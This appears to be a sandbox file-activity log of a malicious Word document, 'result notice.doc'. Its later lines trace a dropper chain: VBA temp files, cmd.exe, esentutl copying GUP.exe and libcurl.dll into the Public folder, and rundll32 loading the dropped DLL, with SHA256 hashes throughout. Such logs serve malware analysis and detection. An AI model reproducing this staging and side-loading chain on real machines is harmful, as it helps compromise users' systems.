[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\ntdll.dll [SHA256: b28a0ca4b411e6742dcae00c8abd240895a4f03860e6580dc7465b09c2ed06d3]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\kernel32.dll [SHA256: e270d5032d2c8d9b226d69103e0fd94f023c82f04c1fc5e8bbd803b40611ea07]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\KernelBase.dll [SHA256: 39660fd6dc55ab245b39b70bacb4907dd3e3bfdb422e6d90edc6768f7ee46935]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\msvcrt.dll [SHA256: 53d6806a9d6965d1aeeed1c86269bb806355e4cc66555aef6a67e9c736e0d3ea]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\sspicli.dll [SHA256: 3425b9ed00caebce1e236dcc33153c1a9b33adff0737f8f6609a9dcdf96185f3]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\rpcrt4.dll [SHA256: edc7d5053ae9ee5751adcf28284a7b59311351d7bcdea8718753f45e43375e03]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\sechost.dll [SHA256: 7a260755e037d004677e868660ad296dfaa40bc5d506301daf1e3125c7fc6a5a]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\advapi32.dll [SHA256: f567801d6612e7dd0012f1e80f70b11684083382a36b7a897cfe279e17965f91]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\combase.dll [SHA256: 89c2d11fa45bfbda0169f9795f46416b494b4963ced4071bde6933d174541f60]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\user32.dll [SHA256: e92ec8d4201a534584a51654eb8c09d81048cc00b9e621c9ff9b787b17377b55]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\gdi32.dll [SHA256: c7606f181e032b0447590b420096d6dc2b0592411c526211a29a48ede60bcc3c]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\ole32.dll [SHA256: 0859857f8191c7089d3ea55a0d7a8c6de74478076ed348f44bad1a63dc7f7d4f]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\shlwapi.dll [SHA256: 139ea756efa385483c040518f096ac404c9433bd1dc7f72702759937dac1720e]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\shell32.dll [SHA256: d6e77e7a412c726189aa8d82cbc89f0fe0bca606e017d69872017539f5ab0720]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\msi.dll [SHA256: 11aca9b15ab0208c270b81fef21809b5c79119cbde16c9e270980c4c63fb5be8]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\msctf.dll [SHA256: d2d320fc7d763fcdb090e44649d3c834324759efbafbb5ec9973b5ed6dace7ba]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\imm32.dll [SHA256: c697c06b6916b3f5d17731ad238a6b405991c8b53bf193ab8c30f5cea146f77a]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\oleaut32.dll [SHA256: b2f1a744bf1b385fd9c261f9e2830ac0205c77388205c10e7b89d5d24e910efd]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\wtsapi32.dll [SHA256: b0f768128add2306a4f113fe81947367d600a54bc6c890c7f2f028885269d2fa]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\msimg32.dll [SHA256: 59476cdc9c9ccfc7f96deb5994460cf0c261bc71503d439e9e5683c66a1385ac]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\GFX.DLL [SHA256: f5571419f20e879bd471a0e34492ce8f97a001c1a6ac9bcff684e1a62a3dca68]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\OART.DLL [SHA256: a3a30d3bb9c91d4aa8a3f52a63c74ead3476ea4c01cea5ac0f044d197b1a13e5]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\WWLIB.DLL [SHA256: 4367ef8212e47e0691479b7f8f0f580566333b322c29c5bf18a36c2737925946]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\OFFICE14\MSO.DLL [SHA256: 82fc7feb22539ba2b106e1291ca029f3190c5714753c8eaa3630496f3a3429a3]
[CreateFolder] WINWORD.EXE:3252 > %LocalAppData%\Temp
[RenameFile] WINWORD.EXE:3252 > %LocalAppData%\Temp\CVR8CDC.tmp => %LocalAppData%\Temp\CVR8CDC.tmp.cvr
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\uxtheme.dll [SHA256: dc0e0db768d273deac8fb2e500be716d947132c1467211781db689ec84a65553]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\dwmapi.dll [SHA256: ba72794a899bdb27019bc6ede22d0b4a4f4b296779d049f324985a2f8102f952]
[CreateFile] taskhostex.exe:2352 > %LocalAppData%\Microsoft\Windows\History\History.IE5\MSHist012019081620190817\container.dat [SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\kernel.appcore.dll [SHA256: a97b9e0e39d0446557339a1c5d7124cbf451a2245dea93ab9ad4c28e08fabdeb]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\bcryptprimitives.dll [SHA256: 3dc1ca931bf86b503847c40a2e2ec0f34821cc1832f2a225e8ff9f422ffff6ae]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\cryptbase.dll [SHA256: 11eccd15dc910b3fc0517b620ef972bdcd09f7730e8ec777947038dc0f45e77d]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\OFFICE14\MSPTLS.DLL [SHA256: 2a50c66126aca9d34bf15b9ac1f6d923e7ac00048338c134f6628f478b6760a3]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\OFFICE14\RICHED20.DLL [SHA256: 336b32af981393580e7241d9b4d28e16f596eb8a024786ea4e03cf380a8c443e]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\mscoree.dll [SHA256: 8fa28e3ed2b6571e40b9471daa45f6a530fe4b644a08dc49847ae66fc77449a4]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\version.dll [SHA256: 892f1f48f6912fb3a2802de052121a0f7780582f71dc6e2778094941405a3c02]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPC.DLL [SHA256: 383ff92cf608b77a1e5e24d65f2089d8b22c1594b58f0f86994322586fe5cede]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\winspool.drv [SHA256: 62f1f36edba9a2c6038e16b6af69eb2e4e9fb73c1f79e46f2d96598516e99421]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\powrprof.dll [SHA256: 598e0772af86c5da9c76b54b92b7c7b192fd12845f899777df3e09db5cff2918]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\SHCore.dll [SHA256: 023509471af375cc18a3e366868d27c0d39c74813f5ddebd284bfd5eed09e68c]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\cfgmgr32.dll [SHA256: f86facb55fe107dd41867cdf108778007e23740614af7c77b4367e6702d99e1f]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\setupapi.dll [SHA256: 58672bca781854bb74481348ea2f0295b79533145e15c3a2c6ba6b3d418390a6]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\clbcatq.dll [SHA256: 3ff2313b1ca561a6ea4e189893c6bcb49b9cc3349cc07768b7bb13d13fdedb06]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\propsys.dll [SHA256: d231ac68c682dbc5ebe6c20a5786fecb974871fc0e516e3a86b5b1d8b8fe6ce8]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\cryptsp.dll [SHA256: 8149c0b9fbb33e990ef904ab70c1f8ee87e56e6d679a5ee91007c9a0f6816bf4]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\bcrypt.dll [SHA256: 307bd41b6335fac22fa4b69186ea67df5177a10deae78a3fa69832aca1d8a93e]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\rsaenh.dll [SHA256: b5c04d9bbfba110af43a99ef11ee617c7e3347b272f72ab99cddb4b165f3565f]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\msxml6.dll [SHA256: 28bcbe84e5aec4b3ab83af0931785c647da25a3e5f35e841207cb1e390b75959]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Microsoft\Windows\INetCache\Content.Word~WRS{53771BEE-7F6F-49C4-9C08-9E0A81B65542}.tmp [File no longer exists]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\profapi.dll [SHA256: b5ac83174682b948bc5fbfe730832f7fb92fab03cec56f8022bd72bd25b63aaf]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\iertutil.dll [SHA256: 8a237056a287bce39772dfe980b352c1f63f5d74de019f49b004337806d3d6be]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\userenv.dll [SHA256: c151d23afc7238f4b66d123f7ee734d339e5870d409ec0766cc2d39325951063]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\wininet.dll [SHA256: 3f01473cf4fd81624442cc4b7c292d0c73d22b7d64f60bf39ae5ced615e95bf6]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\urlmon.dll [SHA256: 206f4af8b5056b3ba3d35de452d69a64dcd685e292e3e4e9b43a65232f3b4a9d]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\secur32.dll [SHA256: 19f44aed5c73ec0a2bc9d89fead580f9627b226717da87561d6a2fc907f98a3b]
[CreateFile] WINWORD.EXE:3252 > %UserProfile%\Desktop\result notice.doc [SHA256: a2d41af0b4f8f0fd950fd4ac164cb2c836fd3c679688b4db75e85ffabfc20d94]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Temp~DFAE2EDCDDAD6D223D.TMP [File no longer exists]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\GKWord.dll [SHA256: 30b7f41142ab9b3430d9ec6c3bf35e17ba5178949e30d6f1012a436e8d408fa3]
[CreateFile] WINWORD.EXE:3252 > %UserProfile%\Desktop~$sult notice.doc [SHA256: 7303b4e9cff6c730349a1b3e9576705f1e52120c983000121d8da92cc228f871]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Microsoft\Windows\INetCache\Content.Word~WRS{A34DFEAD-3E60-4339-9FC2-59278726BB57}.tmp [File no longer exists]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\OFFICE14\USP10.DLL [SHA256: 82395746e82bcd2db1c70480200aeb004eeb20a1e69bf5e09adac013eccc48dd]
[DeleteFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\result notice.doc.LNK
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\linkinfo.dll [SHA256: 2433e7adc9b839b1fc65e93dea5dc72c3ece735cd68cf0f6f8c0920c7fa42cc7]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\ntshrui.dll [SHA256: 2ddbfd810fd87748766ec2d0ee026a8a7df1a889fb54fa687adf11d61e5905e6]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\srvcli.dll [SHA256: 0cbf13c4ba5b6ae20ea412f0b42bd79056a6d26aa02501a00ff33327b08c3e41]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\cscapi.dll [SHA256: d144e35407376f53c7a2d27bbb6d5226641d3eb17f7680b072c7461802fd7099]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\result notice.doc.LNK [SHA256: 57be5633dee8068d77840536245abab18576f5affa4604de000b202a0f45ffe8]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\index.dat [SHA256: 7c38f9a82e51bf579c1765f30393d7e9cdb709377bcd3efb71a80486e22691c0]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\index.dat [SHA256: 7c38f9a82e51bf579c1765f30393d7e9cdb709377bcd3efb71a80486e22691c0]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\index.dat [SHA256: 7c38f9a82e51bf579c1765f30393d7e9cdb709377bcd3efb71a80486e22691c0]
[DeleteFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\result notice.doc.LNK
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\result notice.doc.LNK [SHA256: 57be5633dee8068d77840536245abab18576f5affa4604de000b202a0f45ffe8]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\index.dat [SHA256: 7c38f9a82e51bf579c1765f30393d7e9cdb709377bcd3efb71a80486e22691c0]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\index.dat [SHA256: 7c38f9a82e51bf579c1765f30393d7e9cdb709377bcd3efb71a80486e22691c0]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\Office\Recent\index.dat [SHA256: 7c38f9a82e51bf579c1765f30393d7e9cdb709377bcd3efb71a80486e22691c0]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\WindowsCodecs.dll [SHA256: fd0280d0a43e39af8d8d36cda4a21d29a4cdeada8466abe5e5a1b0523559982e]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\mscms.dll [SHA256: 0b49b1e3221a71dc7a502b62f9834c1e89ce3250000254a1e8ebd74366bec63f]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\msproof7.dll [SHA256: ed7d45df956df795bdf32ec662782bd4e0075a06277e040f0edca2082fc0c31e]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\UProof\CUSTOM.DIC [SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209]
[CreateFile] WINWORD.EXE:3252 > %AppData%\Microsoft\UProof\CUSTOM.DIC [SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\MSOHEV.DLL [SHA256: a4d28765a8a066fbb65822bf35c3b0a3fad60753e663f3b9c62290734ad27fcc]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\msasn1.dll [SHA256: 773af04134239c8af1eedeebcd533453f0e3c18bfe2d295b8d0cb8c38043174f]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\crypt32.dll [SHA256: 6728f5196ea3ea68324027afa15c22fa03357abe840550ff8a55583d3a8daa31]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\devobj.dll [SHA256: 199f85fb59f38837f262e0b56a417e7728bc54a7289f96949d5c503ef097ad84]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\WinSCard.dll [SHA256: 20efb4c6f278b7b9309221ad28737e6231613c28ae35cda53a6df50e6980a5f5]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\winhttp.dll [SHA256: 921bf84860f75fbdc841789b88e7c2835adab3ddce7e7a7e61de23d3376caf96]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPCEXT.DLL [SHA256: 94b1bfeea829bd99768126e2f6cbbcbe13b46fc67b1ea0b6f01edd817d779d51]
[CreateFile] WINWORD.EXE:3252 > %ProgramFiles%\Microsoft Office\Office14\PROOF\1033\MSGR3EN.DLL [SHA256: 556b1e660c66f4e9e0fe50c574589111f29fde8f2929e8330abc4baae49d60d2]
[CreateFile] splwow64.exe:944 > %AppData%\Foxit Software\Foxit PDF Creator\Foxit Reader PDF Printer\1565985645_944__foxittemp.xml [SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855]
[CreateFile] splwow64.exe:944 > %AppData%\Foxit Software\Foxit PDF Creator\Foxit Reader PDF Printer\1565985645_944__foxittemp.xml [SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\icm32.dll [SHA256: a80c1140c7df86929a4537caee6f017024635824c0bb3376a85c5f5575555e18]
[CreateFile] OSPPSVC.EXE:3696 > %AllUsersProfile%\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat [SHA256: 87e0f629460d2b4ca8ac39546a8a02417b2e699097b32e5120c2e92c34f20fe3]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\sxs.dll [SHA256: aaf3b43e5d8fc72fa16c6153e27df5db3eaa0d93e20230784d8d56ad0c9ce015]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\VBA\VBA7\VBE7.DLL [SHA256: 1d413ca1563d93085b8f82dff629144cb92b5a6523c26c2c04d1a887d69c136a]
[CreateFile] WINWORD.EXE:3252 > %CommonProgramFiles%\microsoft shared\VBA\VBA7\1033\VBE7INTL.DLL [SHA256: 3373033c187912d285960b8663d93a833578819433cfeb0cc5d6b602b91c234d]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Microsoft\Windows\INetCache\Content.Word~WRF{C2FB452F-0254-42E0-AFBA-9FA3943F0AE5}.tmp [SHA256: a5c2f91123751b718cff5424b6f3e8569a67ffcfcedb803d2a81fb536a90467c]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\scrrun.dll [SHA256: bf46ca35f7e26f18a4b4287fa80f7cb77078f5861c8185d84b133feec10d034d]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Temp\pense1.txt [SHA256: 248ff1a9fc2e2c465354f64172224a7c7c0c503cc03ce4524de1a2379692b017]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Temp\pense3.txt [SHA256: 68ce133d4b18ddbf04da3462891dc04e945e499e8720183448ddf87e408b98a3]
[CreateFile] WINWORD.EXE:3252 > %LocalAppData%\Temp\sodom.txt [SHA256: 449e1ead309934ac2276a5256cd105dd71d5dd14e49c65bdafc203a0d0eac894]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\mpr.dll [SHA256: 631073911fc93bf187ab8f965d5ac3c5f0f3e0f10e9643d236ab3b3f4d8187ac]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\wshom.ocx [SHA256: 5737986233a525e72270acfb07132d75f7b2e5a15d3294ad6eb31a7d3172f8ee]
[CreateFile] cmd.exe:3232 > %LocalAppData%\Temp\pense2.txt [SHA256: 68ce133d4b18ddbf04da3462891dc04e945e499e8720183448ddf87e408b98a3]
[CreateFile] cmd.exe:3660 > %LocalAppData%\Temptcm.tmp [SHA256: 57bc54e29ae449357549e23e9e9c1874328f841d731e4f02013d14cb487ec911]
[CreateFile] cmd.exe:3660 > %LocalAppData%\Temptcm.tmp [SHA256: 57bc54e29ae449357549e23e9e9c1874328f841d731e4f02013d14cb487ec911]
[CreateFolder] cmd.exe:3660 > %LocalAppData%
[CreateFile] cmd.exe:3660 > %LocalAppData%\Temptcm.tmp [SHA256: 57bc54e29ae449357549e23e9e9c1874328f841d731e4f02013d14cb487ec911]
[DeleteFile] Temptcm.tmp:3444 > %UserProfile%\cer4C8F.tmp
[CreateFile] Temptcm.tmp:3444 > %LocalAppData%\TempGUP.txt [SHA256: 0f951b7a68e9c0984a0bee3c44e2d64aeac6320bbc2ba2a0f1420893550cf441]
[DeleteFile] Temptcm.tmp:2072 > %UserProfile%\cer4D79.tmp
[CreateFile] Temptcm.tmp:2072 > %LocalAppData%\TempGUP2.txt [SHA256: c87fa8aed595df1dea39a07abdd640842b1c24343841bd72e43668bcfba7eaf1]
[DeleteFile] Temptcm.tmp:2984 > %UserProfile%\cer4E35.tmp
[CreateFile] Temptcm.tmp:2984 > %LocalAppData%\Tempsodom.txt [SHA256: 7e5d2994ac1668178db0ee995cf3b6e4b60d437a09fc10f7afe19b0231615ae2]
[CreateFile] esentutl.exe:1920 > %Public%\GUP.exe [SHA256: 0f951b7a68e9c0984a0bee3c44e2d64aeac6320bbc2ba2a0f1420893550cf441]
[CreateFile] esentutl.exe:3124 > %Public%\libcurl.dll [SHA256: c87fa8aed595df1dea39a07abdd640842b1c24343841bd72e43668bcfba7eaf1]
[CreateFile] esentutl.exe:384 > %Public%\sodom.txt [SHA256: 7e5d2994ac1668178db0ee995cf3b6e4b60d437a09fc10f7afe19b0231615ae2]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\dlnashext.dll [SHA256: 9e49ef9396f9dab354b614a6b996a2f222e6958b08e8cc2fbd717e27b4d214b3]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\nsi.dll [SHA256: b86ae3744b94401eec39efc1a57b4f7b56366baf9bac2910937522bb8492ce14]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\ws2_32.dll [SHA256: b6fa4aa5ad3fbbdb62aff76f951eef73e2edf4c96c59249173666a64cf1d136f]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\PlayToDevice.dll [SHA256: 69fcd2e2693eb11d3f0220fe06745306d1f8f958eea0a96531cee92b3a64024b]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\DevDispItemProvider.dll [SHA256: 186411fc5f77f84f1901bfdbfaaf412a5842e3b475c0851ca718e65e3d8ba3ab]
[CreateFile] WINWORD.EXE:3252 > %WinDir%\System32\wpdshext.dll [SHA256: 8f2fcb00bd4237645b7dabe62bab3a7824572ee4c903806b858d6125cf466af2]
[CreateFile] GUP.exe:3980 > %Public%\GUP.exe [SHA256: 0f951b7a68e9c0984a0bee3c44e2d64aeac6320bbc2ba2a0f1420893550cf441]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\ntdll.dll [SHA256: 8b18fec67fe63adfffba5ab1edc9620df7fb0fe3c2597a7518d83cdac7c25715]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\kernel32.dll [SHA256: a78e102ed9cff9b9315b2897f28ffd4de739338a99ab2fce16efc42523e33977]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\KernelBase.dll [SHA256: f48b42f07c1379de1ce45dd23869f72e5a2b5cddf62041efdcaa4cfd96fb97fe]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\nsi.dll [SHA256: 09ba6b60be2c941a1749ba996097c2d000a55a454a42855514d635e8f53ec7a5]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\bcryptprimitives.dll [SHA256: 84e0214e02ab466d05b101fabdc036d5d0ef87d182d023cb4f55380b8ea6c0e3]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\cryptbase.dll [SHA256: e273d0e3869025d786c435886b789a61460c03e395b5405d9e7c1a982a4ff34f]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\sechost.dll [SHA256: e27f15ba362033cd25e785d9f542cbb921b01784db4c278c6f7f757c1c8fa5f5]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\sspicli.dll [SHA256: 4e5a875628d77f36af843e85c2fee419332d7f25d4f2411169edb607b5ae2d9c]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\rpcrt4.dll [SHA256: 3ce77c4d4accf3671d01ada48f79cff9e6d824f5ec6fefd70658ac37b11ec5c9]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\ws2_32.dll [SHA256: 71c13c910a8560cecbec486ecad27c254f7eae471c63a9f549e11baa8cfbe82b]
[CreateFile] GUP.exe:3980 > %WinDir%\SysWOW64\mswsock.dll [SHA256: fb1d20ae19be2572e15972a2fb43b031d9ca244fe8a765ac699083bee9b51e12]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\rundll32.exe [SHA256: 6f9195d85b386099f9f63e3319f5e9e85e0f3a1f0d48cfc9a37e7eff65225933]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\ntdll.dll [SHA256: 8b18fec67fe63adfffba5ab1edc9620df7fb0fe3c2597a7518d83cdac7c25715]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\kernel32.dll [SHA256: a78e102ed9cff9b9315b2897f28ffd4de739338a99ab2fce16efc42523e33977]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\KernelBase.dll [SHA256: f48b42f07c1379de1ce45dd23869f72e5a2b5cddf62041efdcaa4cfd96fb97fe]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\msvcrt.dll [SHA256: 8cb9f3d41b608aa6c6e385035901bf350cb1679d74f965b551490fcd1427129b]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\gdi32.dll [SHA256: 8c225336c8329ea58813d09f48083aee4aaa4f44ce07a1b6a8ce34f88cf14334]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\user32.dll [SHA256: 8fb30bc2029dba1fbbe6330471beb11a8401b071ea36bfced2998b18e3e78a65]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\bcryptprimitives.dll [SHA256: 84e0214e02ab466d05b101fabdc036d5d0ef87d182d023cb4f55380b8ea6c0e3]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\cryptbase.dll [SHA256: e273d0e3869025d786c435886b789a61460c03e395b5405d9e7c1a982a4ff34f]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\sechost.dll [SHA256: e27f15ba362033cd25e785d9f542cbb921b01784db4c278c6f7f757c1c8fa5f5]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\sspicli.dll [SHA256: 4e5a875628d77f36af843e85c2fee419332d7f25d4f2411169edb607b5ae2d9c]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\rpcrt4.dll [SHA256: 3ce77c4d4accf3671d01ada48f79cff9e6d824f5ec6fefd70658ac37b11ec5c9]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\combase.dll [SHA256: 561dc5a4c698e63dcd803cfe9414fecc131e6f8891691b6bcb82a0d6bc289af1]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\shlwapi.dll [SHA256: defc8302b1d1108b2e2f067519380a583dec36e7504b84e27a5cde4a4d7622d5]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\shell32.dll [SHA256: 41a342b70b826b165e0824bce7cbb7901b62e903652949c46cec973219feab08]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\oleaut32.dll [SHA256: ad35ac99d6b4f79c6f4e0eb7296d673eef4045b3e5faa279559e402aec7512c5]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\mpr.dll [SHA256: 281b79f21264f2adf34a5403572bc0cbf2f693c245e93dc5b1a63a1923319982]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\cfgmgr32.dll [SHA256: f7f6ede7cee0c5a5bb4e4e44ca004661931ff91c7c41f08ea41e181a74b1e741]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\setupapi.dll [SHA256: 41372707a2ec9b9c7cdfa8ada02b8f9e5f552b5512a6fbe8b51709dac976402d]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\sfc.dll [SHA256: 4674894d18ce9026ca54afa9556987023c14a92ec24afcb29030b80abf7e0535]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\winspool.drv [SHA256: a1b65bd7cb0d65e55758a508e3a91e7418c139dc7dc5e9ac3744bb3d0cef0cd5]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\sfc_os.dll [SHA256: a4c5e8cc506843b61695e4a0dcd843ec1d8b6c824621528ee033ed2e67c44307]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\msctf.dll [SHA256: a6907b99b943044356cc716d5f622793e0e2b74a716553d3166c9c84422b3c5e]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\imm32.dll [SHA256: 191594b8f37a78f673b0a384af79594268943a6748d1d1c9d3de947555669197]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\imagehlp.dll [SHA256: 6b9edb0a98b821255a5472f1c1e0a30432762f216fdf703c2c532285684b7e4d]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\advapi32.dll [SHA256: 9e3b272bef70f58768fd1348188f5a835dd0509e65fca102999012b363cb81a3]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\ole32.dll [SHA256: 9e818c6c0d61e6f565e3f3ae11af0f5bf9ce63d2a973b49842fa30f85cc3d73d]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\Wldap32.dll [SHA256: 6d60dedfd39120e744260ba67b759ff27a12a55b4a1b323195840a14a38b95f1]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\nsi.dll [SHA256: 09ba6b60be2c941a1749ba996097c2d000a55a454a42855514d635e8f53ec7a5]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\ws2_32.dll [SHA256: 71c13c910a8560cecbec486ecad27c254f7eae471c63a9f549e11baa8cfbe82b]
[CreateFile] rundll32.exe:3548 > %Public%\libcurl.dll [SHA256: c87fa8aed595df1dea39a07abdd640842b1c24343841bd72e43668bcfba7eaf1]
[CreateFile] rundll32.exe:3548 > %WinDir%\SysWOW64\uxtheme.dll [SHA256: 37f31da9d9776e0814156294048d3080b3c8b2fbea0daeb2b42493d1a0fcb5eb]
